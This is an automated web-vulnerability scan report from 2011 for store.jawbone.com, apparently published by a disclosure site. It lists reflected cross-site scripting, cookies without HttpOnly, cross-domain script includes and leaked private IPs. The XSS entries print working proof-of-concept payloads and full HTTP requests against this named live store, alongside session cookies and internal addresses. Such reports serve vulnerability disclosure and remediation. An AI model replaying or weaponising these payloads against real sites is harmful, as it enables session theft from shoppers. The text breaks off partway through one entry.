XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, store.jawbone.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 17 06:22:34 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://store.jawbone.com/DRHM/store [Action parameter]

1.2. http://store.jawbone.com/DRHM/store [name of an arbitrarily supplied request parameter]

1.3. http://store.jawbone.com/store/aliphcom/DisplayHomePage [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

2.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage

2.2. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/

2.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/

3. Cross-domain script include

3.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage

3.2. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/

3.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/

3.4. http://store.jawbone.com/store/aliphcom/en_US/home

4. Private IP addresses disclosed

4.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage

4.2. http://store.jawbone.com/store/aliphcom/DisplayHomePage

4.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/

4.4. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/

5. Content type incorrectly stated

5.1. http://store.jawbone.com/DRHM/store

5.2. http://store.jawbone.com/favicon.ico



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://store.jawbone.com/DRHM/store [Action parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /DRHM/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c56d9'%3balert(1)//827e2a4780a was submitted in the Action parameter. This input was echoed as c56d9';alert(1)//827e2a4780a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DRHM/store?Action=DisplayPagec56d9'%3balert(1)//827e2a4780a&SiteID=aliphcom&Locale=en_US&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; ORA_WX_SESSION="10.1.2.196:516-0#0"; JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; __utmc=28970110; __utmb=28970110.1.10.1305629710; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=65654726459,0)
Date: Tue, 17 May 2011 10:58:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Content-Length: 43336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
ibutes: ['platform', 'miniCartImage']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayPagec56d9';alert(1)//827e2a4780a',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=aliphcom&Locale=en_US&Env=BASE&nextAction=DisplayPagec56d9';alert(1)//827e2a4780a&StyleID=72704
...[SNIP]...

1.2. http://store.jawbone.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the XML document as plain text between tags. The payload 8828e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>01a9c97d387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8828e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>01a9c97d387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=aliphcom&Locale=en_US&nextAction=DisplayHomePage&StyleID=7270400&StyleVersion=63&8828e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>01a9c97d387=1 HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA; ORA_WX_SESSION="10.1.2.196:516-0#0"; JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/xml;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705055348,0)
Date: Tue, 17 May 2011 10:58:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Content-Length: 497

<?xml version="1.0" encoding="UTF-8"?>
<!-- REQUEST ID: TIME=1305629929731:NODE=c1a5202:THREAD=2919 -->
<!--!esi:include src="/store?8828e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>01a9c97d387=1&Action=DisplayESIPage&Currency=USD&ESIHC=fab2c0e2&Env=BASE&Locale=en_US&SiteID=aliphcom&StyleID=7270400&StyleVersion=63&ceid=170911200&cename=SCSMiniCartXsl&id=SCSMiniCartXslPage&nextAction=DisplayH
...[SNIP]...

1.3. http://store.jawbone.com/store/aliphcom/DisplayHomePage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/DisplayHomePage

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 622aa--><script>alert(1)</script>47757b8f785 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/aliphcom/DisplayHomePage?622aa--><script>alert(1)</script>47757b8f785=1 HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://mytalk.jawbone.com/jb2/mytalk/beta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.210:516-0#0"; path=/
Set-Cookie: JSESSIONID=491314B800704B3F7946E35F5F51BE7C; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8DFF859DC77C9AD71; expires=Wed, 16-May-2012 16:48:00 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705054031,0)
Date: Tue, 17 May 2011 10:58:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app54
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3523346698.516.0000; path=/
Content-Length: 238317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?622aa--><script>alert(1)</script>47757b8f785=1&Action=DisplayESIPage&Currency=USD&ESIHC=fab2c0e2&Env=BASE&Locale=en_US&SiteID=aliphcom&StyleID=7270400&StyleVersion=63&ceid=171115600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.jawbone.com
Path:   /store/aliphcom/DisplayHomePage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/aliphcom/DisplayHomePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://mytalk.jawbone.com/jb2/mytalk/beta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.211:516-0#0"; path=/
Set-Cookie: JSESSIONID=FCE84FC4750248CE23D485783007F389; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E867632A0385EC96E2; expires=Wed, 16-May-2012 16:47:46 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=203093666536,0)
Date: Tue, 17 May 2011 10:58:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app55
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.516.0000; path=/
Content-Length: 238177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

2.2. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440000/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/aliphcom/cat/CategoryID.52440000/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=104309908256,0)
Content-Length: 37354
Date: Tue, 17 May 2011 11:06:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

2.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440300/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/aliphcom/cat/CategoryID.52440300/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705533035,0)
Content-Length: 37374
Date: Tue, 17 May 2011 11:06:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

3. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/DisplayHomePage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/aliphcom/DisplayHomePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://mytalk.jawbone.com/jb2/mytalk/beta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.211:516-0#0"; path=/
Set-Cookie: JSESSIONID=FCE84FC4750248CE23D485783007F389; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E867632A0385EC96E2; expires=Wed, 16-May-2012 16:47:46 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=203093666536,0)
Date: Tue, 17 May 2011 10:58:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app55
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.516.0000; path=/
Content-Length: 238177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<link rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain.css" type="text/css">

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.3.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain_new_1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/MiniCart.ShoppingCartService.jQuery-1.3.min.js"></script>
...[SNIP]...
<!-- OwnerIQ Retargeting Tag -->
<script type="text/javascript" src="http://px.owneriq.net/anst/s/jawb.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.4.2.js"></script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/stylishSelect.dltabs.overlay.dropshadow.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngshadows-1.1.min.js"></script>
...[SNIP]...
</script>


    <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js"></script>
...[SNIP]...

3.2. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440000/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/aliphcom/cat/CategoryID.52440000/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=104309908256,0)
Content-Length: 37354
Date: Tue, 17 May 2011 11:06:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<link rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain.css" type="text/css">

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.3.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain_new_1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/MiniCart.ShoppingCartService.jQuery-1.3.min.js"></script>
...[SNIP]...
<!-- OwnerIQ Retargeting Tag -->
<script type="text/javascript" src="http://px.owneriq.net/anst/s/jawb.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.4.2.js"></script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/stylishSelect.dltabs.overlay.dropshadow.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngshadows-1.1.min.js"></script>
...[SNIP]...
</script>


    <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js"></script>
...[SNIP]...

3.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440300/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/aliphcom/cat/CategoryID.52440300/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705533035,0)
Content-Length: 37374
